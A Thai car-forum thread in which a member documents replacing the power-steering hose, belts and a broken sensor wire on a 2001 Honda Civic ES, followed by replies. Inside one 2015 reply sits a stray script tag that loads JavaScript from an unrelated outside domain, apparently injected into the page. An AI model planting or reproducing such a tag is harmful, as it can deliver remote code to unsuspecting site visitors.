ตอบ
itcentre

เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 3 พฤษภาคม 2013 17:58 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
Update เปลี่ยนท่อน้ำมันพาวเวอร์   อ้างอิงจากกระทู้เดิมนะครับ 

ในเวปเองก็มีสมาชิกหลายท่านได้เปลี่ยนและมีประสบกาม..เอ๊ย..การณ์
กันไปแล้ว..มาขอเสริมพร้อมรูปภาพนิดหน่อยเป็นข้อมูลเพิ่มเติมล่ะกันครับ
เมื่อวานลางานไปเปลี่ยนมาครับ Update เปลี่ยนท่อน้ำมันพาวเวอร์

มาแต่เช้า ศูนย์ยังไม่เปิด เป็นคันแรก 06.30น.เช้าไปไหม.. Update เปลี่ยนท่อน้ำมันพาวเวอร์
Update เปลี่ยนท่อน้ำมันพาวเวอร์

สักพักก็ทะยอยตามกันมาอื้อเลยครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์
Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพก่อนเอาผ้าเทปพันสายไฟครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพก่อนเปลี่ยนครับ เอาผ้าเทปพันสายไฟพันปิดไว้ก่อน
กันน้ำมันรั่วไหล แต่ก็เอาไม่อยู่..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ของใหม่ ใครๆก็ชอบ แต่ไม่ชอบราคา  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ไม่ลืมที่เช็คหาสาเหตุว่าทำไม่เวลาใช้ความเร็วที่เกินร้อย  Update เปลี่ยนท่อน้ำมันพาวเวอร์
แล้วไฟเตือน ABS ชอบติด  Update เปลี่ยนท่อน้ำมันพาวเวอร์
(แต่ก่อนหน้าก็รู้มาแล้วครับว่าหาเหตุจากอะไร)  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ถอดกรองอากาศออกแล้ว  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ดึงสายน้ำมันพาวเวอร์ออกแล้วใส่ขวดไว้ก่อน จากนั้นสตาร์ทเครื่องยนต์
เพื่อดันให้น้ำมันพาวเวอร์ที่ค้างอยู่ในสายออกให้หมด  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ปลดขั้ว CS จากท่อพาวเวอร์ ออกก่อน  Update เปลี่ยนท่อน้ำมันพาวเวอร์

น้ำมันพาวเวอร์แดงๆใสๆ หลังจากถอดสายพาวเวอร์ออกครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

อันนี้จุดเชื่อมต่อตัวใน   Update เปลี่ยนท่อน้ำมันพาวเวอร์

ถอดปลั๊กจากท่อพาวเวอร์ตัวเก่ามาใส่ท่อพาวเวอร์ตัวใหม่  Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพเน่าๆของท่อพาวเวอร์ตัวเก่า มีพันเทปสายไฟด้วย
จากจีนแดงเป่าฟ๊ะนี่..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

เริ่มใส่ปลายท่อพาวเวอร์เส้นใหม่เข้าไปก่อน  Update เปลี่ยนท่อน้ำมันพาวเวอร์

แล้วค่อยตามด้วยต้นทางของน้ำมันพาวเวอร์
สีใส๊..ใส..น่ากิน..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

31. Part Number ของท่อพาวเวอร์ครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

อันนี้เครื่องเทพของช่างศูนย์ Honda แค่เสียบ ตอบโจท์ได้หมด
แต่จะตีโจทย์แตกหรือเปล่า อยู่ที่ช่างแล้วครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ของใหม่ครับ ดูดีมีสกุล..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ให้น้ำกินซะหน่อย ใสๆ.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

หลังจากใส่ท่อพาวเวอร์ใหม่เข้าไปเรียบร้อยแล้ว และใส่กรองอากาศ
ลองสตาร์ทเครื่องยนต์ดู พบปัญหาใหม่นั่นคือ ไฟรูปเครื่องยนต์ขึ้นโชว์
งานเข้าล่ะซีครับ..ไม่ใช่ DTC ครับ เพราะเพิ่งเปลี่ยนไปเมื่อปีที่แล้ว
แต่มาจากอะไรตามไปดูกันครับ เพราะไฟรูปเครื่องยนต์ไม่จำเป็นต้องเป็น
DTC อย่างเดียวแน่นอน...   Update เปลี่ยนท่อน้ำมันพาวเวอร์

ระบบแจ้งว่ามาจาก  เซ็นเซอร์ IAT(2) มีใครรู้บ้างครับว่าตัวปัญหาคืออะไร
ห้ามดูคำเฉลยคือภาพต่อไปนะครับ...  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ตัวอะไรบ้างที่ใช้ไฟ +-5Volt  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ถูกต้องแล้วคร๊าบบบบ..มันคือตัวนี้ที่ใช้ไฟ +-5V. แล้วมันเป็น Sensor ของ
อะไรล่ะครับ เดากันออกไหม..ติ๊ก..ต๊อก..ๆ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ดูกันชัดๆอีกภาพ..เดากันออกไหม..ติ๊ก..ต๊อก..ๆ
และเห็นความผิดปกติของอุปกรณ์
ตัวนี้กันบ้างไหมครับ..ใครเห็นยกมือบอกผมด้วยนะครับ
จะมอบรางวัลเลย..   Update เปลี่ยนท่อน้ำมันพาวเวอร์

เช็คที่ปลายทางไม่เจอปัญหา เลยต้องมาเช็คที่ต้นทาง นั่นคือ กล่อง ECU
โห..เล่นแรงนะนี่..เล่นเช็คกล่องกันเลยทีเดียว..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

หลังจากเช็คอยู่นานพักใหญ่ ช่างของศูนย์ถึงกับต้องไปแบก manual Update เปลี่ยนท่อน้ำมันพาวเวอร์  เล่มหนาใหญ่ 
มากางวิชาออกกันเลยทีเดียว เทสทุกอย่าง ลองทุกอย่างก็แล้ว..ก็ยังไม่เจอปัญหา
ท้ายสุด..เรียกหัวหน้ามาช่วยดู..ก็เจอนี่เลยครับ ตัวปัญหาเท่าเส้นผม แต่บังภูเขาซะงั้น.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

สายไฟครับ..สายไฟขาดใน  Update เปลี่ยนท่อน้ำมันพาวเวอร์

มันคงขาดช่วงที่ช่างดึงออกจากปลั๊ก ชัดๆกันเลยครับ ว่าขาดในจริงๆ Update เปลี่ยนท่อน้ำมันพาวเวอร์

โชคดีมากที่ไม่เกี่ยวกับน้องหนูราคาค่าตัวแสนแพงตัวนี้.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

ขั้นต่อไปก็มารื้อชุดฝาครอบออกให้หมด ไม่งั้นเปลี่ยนสายพานไม่ได้
สีน้ำมันหล่อลื่นมันยังโอเคไหมหว่า..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

นี่ครับ ชุดสายพานของ ES  Update เปลี่ยนท่อน้ำมันพาวเวอร์
ชุดใหม่ทั้งหมดที่จะถูกเปลี่ยนในวันนี้
- สายพานไทม์มิ่ง
- สายพานคอมเพรสเซอร์แอร์
- สายพานปั้มพาวเวอร์
- ลูกปืนล้อหน้าซ้าย
- ซีลเพลาข้อเหวี่ยง (แต่ตัวนี้ไม่ได้เปลี่ยนหรอกครับ เพราะเพิ่งเปลี่ยนไปเมื่อเร็วๆนี้เอง
  ที่เจอปัญหาความร้อนขึ้นแล้วก็ต้องปาดฝาสูบ) รายการนี้อยู่ได้ประมาณ 200,000 กิโล
  เลยนะครับ ถ้ามีการเปลี่ยนใหม่..ไม่เหมือนซีลหน้าเครื่อง อยู่ได้แค่ 100,000กิโล  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ดูสภาพน้ำมันพาวเวอร์ที่มันกระเด็นไปเปื้อนตามจุดต่างๆครับ เน่ามาก..
เตรียมถอดล้อเพื่อเปลี่ยนลูกปืน  Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพของสายพานคอมเพรสเซอร์แอร์ครับ มันขาดและหักเป็นระยะๆ Update เปลี่ยนท่อน้ำมันพาวเวอร์

รื้อๆ ถอดๆ..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

มีรอยคราบน้ำมันพาวเวอร์เยิ้มเต็มไปทั่วพื้นด้านล่าง.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

นี่ก็เน่า..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

DTC เช็คศูนย์ตายตัวล่างครับ พลอยเน่าไปกับเค้าด้วย..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพของสายพานไทม์มิ่งเมื่อยังอยู่ในเครื่องยนต์
เริ่มมีรอยแตกหักบ้างแล้ว  Update เปลี่ยนท่อน้ำมันพาวเวอร์

อันนี้สายพานปั้มพาวเวอร์ครับ มีรอยฉีกขาดและหักเป็นช่วงๆ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

เปรียบเทียบกันเลยครับ ซ้ายสายพานคอมเพรสเซอร์แอร์
มีรอยฉีกขาดทะลุตรงกลางด้วย ขวาสายพานปั้มพาวเวอร์ Update เปลี่ยนท่อน้ำมันพาวเวอร์

นี่ก็แตกหักครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

คู่หู Duo เน่ามาก.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

ผลกระทบจากน้ำมันพาวเวอร์รั่ว ฝาครอบกันฝุ่นหน้าเครื่องก็โดนกับเค้าด้วยเหมือนกัน
เน่าเลย..แถมยางกันฝุ่นก็บวมด้วย..จากน้ำมันพาวเวอร์..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ลูกปืนล้อหน้าแบบมี ABS  ใสๆใหม่ๆ เลยครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

อันนี้ซีลหน้าเครื่องของแท้จาก Honda แต่ไม่มีตรา Honda ซะงั้น.. Update เปลี่ยนท่อน้ำมันพาวเวอร์

สภาพของสายพานไทม์มิ่ง มีรอยแตกงาและหักเป็นบางช่วง
โชคดีที่ได้เปลี่ยนซะ Update เปลี่ยนท่อน้ำมันพาวเวอร์

ของเก่าขายได้เป่าหว่า..555 ใครรับซื้อบ้าง..อ๊ะๆ..เส้นละ 5 บาทก็ได้  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ซีลหน้าเครื่องของเดิมที่ยังไม่ได้เปลี่ยน..ดูแล้วไม่มีปัญหาอะไร แต่ก็ไหนๆแล้ว
เปลี่ยนสายพานทั้งที เปลี่ยนมันไปด้วยเลยหล่ะกัน..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

แกะซีลหน้าเครื่องออกแล้ว..ทำความสะอาดจั๊กหน่อย..ถูๆ..ไถๆ..  Update เปลี่ยนท่อน้ำมันพาวเวอร์

จะใส่สายพานไทม์มิ่งได้ง่าย จะต้องดึงสปริงตัวที่เห็นในรูปออกครับ
ไม่งั้นใส่ลำบากมาก  Update เปลี่ยนท่อน้ำมันพาวเวอร์

หลังจากเปลี่ยนสายพานไทม์มิ่งแล้ว ก็ถึงเวลาประกอบชิ้นส่วนกลับเข้าที่
เริ่มจากแท่นวางคอมพ์แอร์  Update เปลี่ยนท่อน้ำมันพาวเวอร์

ดูดีขึ้นนิดหลังจากล้างด้วยน้ำมันเบนซินขาว..
ผมจับราดเลยครับ เค้ามีที่ฉีดให้ แต่ไม่ทันใจ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

เบนซินขาวครับ เหมือนน้ำเปล่าใสๆนี่เอง แต่มีกลิ่นครับ  Update เปลี่ยนท่อน้ำมันพาวเวอร์

เบนซินขาวยี่ห้อ Honda Type-1 coolant ซะงั้น Update เปลี่ยนท่อน้ำมันพาวเวอร์

ค่าเสียหายท่อน้ำมันพาวเวอร์   Update เปลี่ยนท่อน้ำมันพาวเวอร์

ค่าเสียหายอะไหล่ที่ซื้อมาเปลี่ยนครับ Update เปลี่ยนท่อน้ำมันพาวเวอร์

ขอบคุณทุกท่านที่แวะเยี่ยมชมคร๊าบบบบบ

fufufulll

เข้าร่วม: 02 เมษา 2013
ตอบ: 75

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 57
ให้คำขอบคุณ: 82

ศุกร์, 3 พฤษภาคม 2013 19:54 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
แหล่มอยากเปลี่ยนมั่งจัง

ได้รับคำขอบคุณจาก: itcentre 
OUM

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2141
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 3 พฤษภาคม 2013 21:06 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ไม่แพงเท่าไรแฮะ
tiger2217

ชื่อเล่น: เสือ

เข้าร่วม: 23 ธันวา 2011
ตอบ: 2949

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1500
ให้คำขอบคุณ: 1770

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 3 พฤษภาคม 2013 21:28 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
    ครบเลย
aum1977

ชื่อเล่น: อ้ำ

เข้าร่วม: 04 เมษา 2010
ตอบ: 84

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 2

สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 3 พฤษภาคม 2013 21:48 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
kort999

ชื่อเล่น: กรต

เข้าร่วม: 28 มิถุนา 2011
ตอบ: 1836

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1998
ให้คำขอบคุณ: 699

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 3 พฤษภาคม 2013 23:13 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ละเอียดยิบครับ
flatron24

เข้าร่วม: 24 ธันวา 2011
ตอบ: 784

Guru ES
Guru ES

ได้รับคำขอบคุณ: 469
ให้คำขอบคุณ: 35

ศุกร์, 3 พฤษภาคม 2013 23:47 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ใช้ยาวๆต่อไปครับ
Paul_Jack

ชื่อเล่น: แจ๊คกี้

เข้าร่วม: 07 สิงหา 2011
ตอบ: 131

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 47
ให้คำขอบคุณ: 108

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 4 พฤษภาคม 2013 00:14 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ในศูนย์เราสามารถเข้าไปดูได้ด้วยหรอครับ อันนี้ไม่ทราบเลย
itcentre

ครอบครัว ES
ครอบครัว ES

เสาร์, 4 พฤษภาคม 2013 13:45 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
Paul_Jack พิมพ์ว่า:
ในศูนย์เราสามารถเข้าไปดูได้ด้วยหรอครับ อันนี้ไม่ทราบเลย

จริงแล้ว ผมว่าก็คงไม่น่าเข้าไปหรอกครับ ทางศูนย์มีห้อง vip ให้นั่งกินกาแฟ ชมทีวี
แต่ผมไปหลายครั้งแล้ว สนิทกับช่างในนั้น เลยเข้าออกได้บ้างครับ ที่สำคัญ ซ่อมรถครั้งนี้
ผมลงมือล้างคราบน้ำมันมันเองเลยครับ เห็นแล้วหงุ..หงิ.. เลยขอจัดเองเลย...

ได้รับคำขอบคุณจาก: padonzzz  csirinant 
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 15 พฤษภาคม 2014 11:20 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
...
civicnoom

ชื่อเล่น: หนุ่ม

เข้าร่วม: 31 สิงหา 2012
ตอบ: 136

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 1780

พฤหัส, 15 พฤษภาคม 2014 14:11 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ค่าแรงเปลี่ยนชุดสายพานเท่าไรหรอครับ
thanakon

เข้าร่วม: 22 พฤษภาคม 2011
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 27
ให้คำขอบคุณ: 0
พฤหัส, 15 พฤษภาคม 2014 14:41 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
จบยังครับ

tawat.puksri

เข้าร่วม: 08 มีนา 2014
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 86
ให้คำขอบคุณ: 60

ศุกร์, 16 พฤษภาคม 2014 12:22 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ยกชุดอย่างนี้ อุ่นใจเลยครับ
OMO-knight

เข้าร่วม: 15 มกรา 2014
ตอบ: 305

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 63

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 พฤษภาคม 2014 13:14 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ข้อมูลเยี่ยมจริงๆ...
somchai10

เข้าร่วม: 08 มิถุนา 2010
ตอบ: 1663

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 488
ให้คำขอบคุณ: 103
ศุกร์, 16 พฤษภาคม 2014 15:27 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
พี่มีสายเพาวเวอร์ของยุ่นขายคับ ถ้าของใครเสียโทรมาถามได้คับ 081-8333968
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ศุกร์, 16 พฤษภาคม 2014 16:49 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ของผมก็เยิ้มเหมือนกันอ่ะ
somchai10

เข้าร่วม: 08 มิถุนา 2010
ตอบ: 1663

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 488
ให้คำขอบคุณ: 103
ศุกร์, 16 พฤษภาคม 2014 20:53 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
N_J Civic พิมพ์ว่า:
ของผมก็เยิ้มเหมือนกันอ่ะ

สนใจสายเพาวเวอร์โทรมาได้คับ
neosmith

เข้าร่วม: 06 พฤษภาคม 2014
ตอบ: 7

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 0
จันทร์, 19 พฤษภาคม 2014 19:23 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ว่าจะเปลี้ยนสายปั๊มเพาเวอร์อยู่เหมือนกัน
Mundo

ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

ปี: 2004
อังคาร, 20 พฤษภาคม 2014 08:33 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
รีวิวได้ดีมากเลยครับ 
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

อังคาร, 20 พฤษภาคม 2014 11:12 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
เอ่อม..เปลี่ยนเองได้ไหมครับ สายต่าง ๆ จากที่พี่ไปสังเกตุช่างเค้าทำ
R_pongpat

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 204

ได้รับคำขอบคุณ: 39
ให้คำขอบคุณ: 1

อาทิตย์, 15 มิถุนา 2014 09:57 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
เก็บข้อมูลคับ
wuttikri

ชื่อเล่น: แปร

เข้าร่วม: 08 กันยา 2015
ตอบ: 18

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 1126

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 24 กันยา 2015 15:37 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
  ข้อมูลแน่นมาก ขอบคุณครับ
supas

เข้าร่วม: 09 มีนา 2010
ตอบ: 301

ได้รับคำขอบคุณ: 159
ให้คำขอบคุณ: 73
พฤหัส, 24 กันยา 2015 18:11 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ท่านใดมีสายท่อแอรเส้นใหญ่ที่วิ่งคู่กับสายเพาเวอร์ไม่ใช้ไหมครับของผมซึมแล้วครับ
aek1675

ชื่อเล่น: เอก

เข้าร่วม: 31 สิงหา 2015
ตอบ: 208

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 4

สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 25 กันยา 2015 08:53 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ข้อมูลแน่นๆเลยคับ..ของผมก็เย้มแล้ว555

ขอบคุณคับ
kkanakornkum

ชื่อเล่น: เค

เข้าร่วม: 04 มกรา 2014
ตอบ: 495

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 275
ให้คำขอบคุณ: 37

สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 25 กันยา 2015 12:19 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
แจ่ม
dpdome32

เข้าร่วม: 25 ตุลา 2008
ตอบ: 74

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 73
ให้คำขอบคุณ: 1
ศุกร์, 25 กันยา 2015 12:53 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
สงสัยครับว่า  เปลี่ยนสายพานไทมิ่ง   ทำไมไม่มีค่าแรง      264   บาทนั่น  ค่าเปลี่ยนสายเพาเวอร์ใช่ไหม   หรือทำ 2 เคส

ค่าแรง  264 บาท  จะได้รีบไปทำบ้าง  ศูนย์ไหนครับ
itcentre

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 27 กันยา 2015 14:12 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
dpdome32 พิมพ์ว่า:
สงสัยครับว่า  เปลี่ยนสายพานไทมิ่ง   ทำไมไม่มีค่าแรง      264   บาทนั่น  ค่าเปลี่ยนสายเพาเวอร์ใช่ไหม   หรือทำ 2 เคส

ค่าแรง  264 บาท  จะได้รีบไปทำบ้าง  ศูนย์ไหนครับ

มาตอบครับ

ชุดราคาของสายพานต่างๆ ผมซื้อของในศูนย์ แต่มาเปลี่ยนเองข้างนอกครับ

ส่วนรายการเปลี่ยนท่อน้ำมันพาวเวอร์ เปลี่ยนในศูนย์ครับ
ทำในศูนย์รายการเดียวครับ

"<script src="https://sport32news.com/civicesgroup.js">

kukanan

ชื่อเล่น: ติ

เข้าร่วม: 21 ตุลา 2014
ตอบ: 109

ได้รับคำขอบคุณ: 31
ให้คำขอบคุณ: 17

พฤหัส, 17 ธันวา 2015 17:19 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ผมว่าจะโดนแบบนี้บ้างละ
tonmojisung

ชื่อเล่น: ต้น

เข้าร่วม: 25 กันยา 2014
ตอบ: 39

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 7
ให้คำขอบคุณ: 131

พฤหัส, 17 ธันวา 2015 19:54 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
สุดยอดคับ
kukanan

ชื่อเล่น: ติ

เข้าร่วม: 21 ตุลา 2014
ตอบ: 109

ได้รับคำขอบคุณ: 31
ให้คำขอบคุณ: 17

จันทร์, 28 ธันวา 2015 09:02 - Update เปลี่ยนท่อน้ำมันพาวเวอร์
ไปโดนมาแล้วครับ  
ผมเปลียนทั้งชุดเลย 5000 นิดๆ 

วันนี้หัวฉีดดับไปอีก 1 จุกอีก  สิ้นปี โดนเยอะเลย
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.